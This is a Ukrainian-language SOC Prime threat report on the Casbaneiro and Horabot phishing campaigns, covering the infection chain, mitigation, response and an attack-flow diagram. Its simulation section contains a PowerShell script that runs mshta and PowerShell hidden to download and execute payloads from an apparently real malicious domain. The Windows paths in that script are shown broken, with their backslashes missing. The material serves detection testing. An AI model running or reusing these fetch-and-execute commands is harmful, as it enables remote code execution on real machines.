Аналіз багатогранних кампаній Casbaneiro: вивчення численних атак Мароудера

Ruslan Mikhalov Керівник досліджень загроз у SOC Prime

Стежити

Аналіз багатогранних кампаній Casbaneiro: вивчення численних атак Мароудера

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Розслідування

Дослідники реконструювали ланцюг від початкового вкладення до виконання кінцевого шкідливого навантаження. Вони проаналізували стадію HTA, яка запускає mshta.exe, після чого відбувається двоетапне завантаження JavaScript/VBScript та використовуються компоненти AutoIT для декодування контейнерів, зашифрованих AES, з жорстко закодованим значенням. Статичний аналіз підтвердив наявність бінарних файлів Horbot і Casbaneiro, а також логіку протидії аналізу, яка перевіряє імена користувачів у пісочницях та артефакти, пов’язані з віртуальними машинами. Мережеві спостереження виявили інфраструктуру C2, прикриту доменами, захищеними Cloudflare, та PHP-API, що використовується для генерації динамічних PDF для кожної жертви під час фази доставки.

Мітигація

Блокуйте або ретельно контролюйте виконання mshta.exe для ненадійного вмісту та посилюйте перевірку вкладень для ланцюжків на основі ZIP/HTA/скриптів. Моніторьте аномальну поведінку PowerShell, що взаємодіє з об’єктами COM Outlook, що може вказувати на поширення через поштові скриньки. На мережевому рівні блокуйте або попереджуйте про виявлені шкідливі домени та IP-адреси, а також застосовуйте фільтрацію URL для обмеження доступу до сервісів генерації PDF, які використовуються для етапування. Використовуйте білий список застосунків для запобігання запуску інтерпретаторів AutoIT без безпосереднього погодження.

Відповідь

При виявленні активності ізолюйте кінцеву точку, зупиніть підозрілі процеси mshta.exe та PowerShell і видаліть новостворені артефакти – особливо файли, розміщені в загальнодоступних директоріях. Збирайте HTA, VBS і AutoIT-етапи для судово-медичної перевірки, потім шукайте staticdata.dll і at.dll на постраждалих хостах. Скиньте облікові дані для скомпрометованих облікових записів електронної пошти, вимкніть шкідливу автоматизацію або правила COM Outlook та оновіть контент для виявлення з вилученими IOC, постійно стежачи за латеральним поширенням та подальшим фішингом з захоплених поштових скриньок.

Ключові слова: Augmented Marauder, Water Saci, Casbaneiro, Horbot, Латинська Америка, іспанський фішинг, приманка WhatsApp, ClickFix, HTA, mshta.exe, завантажувач VBScript, JavaScript, AutoIT, PowerShell, COM Outlook, AES-декодування, UUID ZIP, PDF із захистом паролем, Cloudflare C2, PHP API, банківський троян, захоплення облікового запису електронної пошти.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% Node definitions action_phish_attach["Action – T1566.001 Phishing: Spearphishing Attachment Malicious email with passwordu2011protected PDF masquerading as a judicial summons"] class action_phish_attach action action_phish_link["Action – T1566.002 Phishing: Spearphishing Link Link in PDF triggers automatic download of a ZIP file with random UUID name"] class action_phish_link action file_zip["File – ZIP archive Contains HTA file"] class file_zip file file_hta["File – HTA file Executed via mshta.exe"] class file_hta file process_mshta["Process – mshta.exe Loads JavaScript that fetches secondu2011stage VBScript"] class process_mshta process script_vb["Action – T1059.005 Command and Scripting Interpreter: Visual Basic Sandbox checks and payload download"] class script_vb malware action_sandbox_evasion["Action – T1497.002 Virtualization/Sandbox Evasion User activity based checks for sandbox usernames and VM artifacts"] class action_sandbox_evasion action action_deobfuscation["Action – T1140 Deobfuscate/Decode Files or Information Runtime deobfuscation of strings and code"] class action_deobfuscation action script_powershell["Action – T1059.001 Command and Scripting Interpreter: PowerShell Downloads AutoIT interpreter and harvests Outlook contacts"] class script_powershell malware tool_outlook["Tool – Outlook COM objects Scrape address book for email propagation"] class tool_outlook tool tool_autoit["Tool – AutoIT Compiled scripts produce encrypted payloads"] class tool_autoit tool action_compile["Action – T1027.004 Obfuscated Files or Information: Compile After Delivery Payloads compiled on host before execution"] class action_compile action malware_dll["Malware – Encrypted DLLs (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["Process – Reflective DLL loading Loads DLLs directly into memory without writing to disk"] class process_reflect_load process action_injection["Action – T1055.001 Process Injection: DLL Injection Reflectively loaded DLLs injected into processes"] class action_injection action persistence_shortcut["Persistence – T1547.009 Shortcut Modification LNK placed in Startup folder"] class persistence_shortcut persistence c2_communication["C2 – T1102 Web Service HTTP GET/POST via Cloudflareu2011protected domains"] class c2_communication c2 tool_turo["Tool – Turo.exe (AutoIT compiled)"] class tool_turo tool tool_tekojac["Tool – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["Action – T1036.008 Masquerading PDF and ZIP files appear legitimate"] class action_masquerade action %% Connections action_phish_attach –>|delivers| file_zip file_zip –>|contains| file_hta file_hta –>|executed by| process_mshta process_mshta –>|loads| script_vb script_vb –>|performs| action_sandbox_evasion action_sandbox_evasion –>|leads to| action_deobfuscation action_deobfuscation –>|reveals| script_powershell script_powershell –>|uses| tool_outlook script_powershell –>|downloads| tool_autoit tool_autoit –>|produces| action_compile action_compile –>|generates| malware_dll malware_dll –>|loaded by| process_reflect_load process_reflect_load –>|enables| action_injection action_injection –>|injects into| process_mshta action_injection –>|enables| persistence_shortcut persistence_shortcut –>|maintains| c2_communication script_powershell –>|downloads| tool_turo script_powershell –>|downloads| tool_tekojac action_masquerade –>|covers| action_phish_attach action_masquerade –>|covers| action_phish_link %% Styling class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "

Потік атаки

Перегляд

Імітаційне виконання

Необхідна умова: Телеметричний чек попереднього польоту та базовий рівень повинні бути пройдені.

Обґрунтування: У розділі детально описується точне виконання ворожої техніки (TTP), призначене для того, щоб викликати правило виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP і мають генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади приведуть до неправильної діагностики.

Сценарій атаки та команди:
Зловмисник прагне встановити присутність на робочій станції жертви, використовуючи Mshta для завантаження та виконання шкідливого навантаження HTA, розміщеного на https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK. Одразу після цього актор використовує PowerShell для завантаження скрипта другого етапу з того ж домену за допомогою Invoke‑WebRequest і виконати його в пам’яті. Обидва бінарні файли запускаються з підвищеного командного рядка, щоб збільшити ймовірність фіксації аудиту.

Сценарій тесту регресії:

# Імітація атаки Horabot – викликає як mshta, так і PowerShell в одній сесії
# 1. Запустіть Mshta з шкідливим URL
$htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK"
Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden

# 2. Запустіть PowerShell для завантаження та виконання віддаленого скрипта
$psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" `
    -WindowStyle Hidden

Команди з очищення:

# Завершіть виконання всіх підозрілих процесів (якщо вони вижили)
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Видаліть усі файли, які могли бути залишені (приклади розташування)
$paths = @(
    "$env:TEMPpayload.ps1",
    "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta"
)
foreach ($p in $paths) {
    if (Test-Path $p) { Remove-Item -Path $p -Force }
}

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно